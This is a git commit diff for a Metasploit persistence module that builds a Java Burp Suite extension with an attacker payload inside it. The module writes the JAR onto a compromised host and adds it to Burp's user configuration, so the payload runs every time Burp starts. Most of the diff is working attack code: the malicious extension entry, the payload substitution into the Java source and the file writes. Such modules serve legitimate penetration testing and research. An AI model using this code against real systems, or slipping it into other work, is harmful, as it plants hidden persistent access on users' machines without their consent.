more trial and error

h00die · Dec 31, 2024 · f22380c · f22380c
1 parent 3565f89
commit f22380c
Showing 1 changed file with 27 additions and 16 deletions.
diff --git a/modules/exploits/multi/local/burp_extension_persistence.rb b/modules/exploits/multi/local/burp_extension_persistence.rb
@@ -30,7 +30,8 @@ def initialize(info = {})
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => false,
         'References' => [
-          [ 'URL', 'https://portswigger.net/burp/documentation/desktop/extensions/creating' ]
+          [ 'URL', 'https://portswigger.net/burp/documentation/desktop/extensions/creating' ],
+          [ 'URL', 'https://portswigger.net/burp/documentation/desktop/troubleshooting/launch-from-command-line' ]
         ],
         'Arch' => [ARCH_CMD],
         'DefaultOptions' => {
@@ -87,7 +88,7 @@ def int_to_slash_x_number(length, min_length = 0)
     encoded
   end
 
-  def add_extension(settings_file, extension_location)
+  def add_extension(settings_file, extension_location, extension_name)
     # open file
     config_contents = read_file(settings_file)
     # store as loot for backup purposes
@@ -100,19 +101,23 @@ def add_extension(settings_file, extension_location)
       fail_with(Failure::Unknown, "Failed to parse json config file: #{settings_file}")
     end
     malicious_extension = {
-      errors: 'ui',
-      extension_file: extension_location,
-      extension_type: 'java',
-      loaded: true,
-      name: datastore['NAME'],
-      output: 'ui'
+      'errors' => 'ui',
+      'extension_file' => extension_location,
+      'extension_type' => 'java',
+      'loaded' => true,
+      'name' => extension_name,
+      'output' => 'ui'
     }
-    config_contents['user_options']['extender']['extensions'] << malicious_extension
+    begin
+      config_contents['user_options']['extender']['extensions'] << malicious_extension
+    rescue NoMethodError
+      fail_with(Failure::Unknown, "Failed to find 'user_options' in config file: #{settings_file}, likely a project settings file not user.")
+    end
     # write json
-    write_file(settings_file, JSON.pretty_generate(config_contents))
+    write_file(settings_file, JSON.pretty_generate(config_contents, { 'space' => '', 'indent' => ' ' * 4 }))
   end
 
-  def run_local_gradle_build
+  def run_local_gradle_build(extension_name)
     # Check if gradle is installed
     fails_with(Failure::NotFound, 'Gradle is not installed on this system (not target).') unless system('which gradle > /dev/null 2>&1')
 
@@ -126,10 +131,10 @@ def run_local_gradle_build
     FileUtils.cp(File.join(src_dir, 'build.gradle'), temp_dir)
 
     # Modify burpExtension.java
-    java_file = File.join(temp_dir, 'src', 'burpExtension.java')
+    java_file = File.join(temp_dir, 'src', 'main', 'java', 'BurpExtender.java')
     text = File.read(java_file)
     new_contents = text.gsub('FOOBARBAZ', payload.encoded)
-                       .gsub('Metasploit Payload Extension', datastore['NAME'])
+                       .gsub('Metasploit Payload Extension', extension_name)
     File.open(java_file, 'w') { |file| file.puts new_contents }
 
     # Run gradle clean build
@@ -204,12 +209,18 @@ def exploit
     extension_name = extension_name_generator
     print_status("Using extension name: #{extension_name}")
     extension_location = "#{datastore['WritableDir']}/#{extension_name}.jar"
+    vprint_status('Compiling JAR file')
+    jar = run_local_gradle_build(extension_name)
     vprint_status("Writing malcious extension to disk: #{extension_location}")
-    write_file(extension_location, compiled_extension(extension_name))
-    register_files_for_cleanup(extension_location)
+
+    write_file(extension_location, jar)
+    # write_file(extension_location, compiled_extension(extension_name))
     vprint_status('Updating config file')
-    add_extension(datastore['CONFIG'], extension_location)
+    add_extension(datastore['CONFIG'], extension_location, extension_name)
 
     print_good('Extension enabled, waiting for Burp to open with the config.')
+
+    # config files must be applied, and on boot doesn't seem to work
+    # /usr/lib/jvm/java-23-openjdk-amd64/bin/java -jar -Xmx4g -Djava.awt.headless=true /usr/share/burpsuite/burpsuite.jar burp.StartBurp --user-config-file=/tmp/burp.json &
   end
 end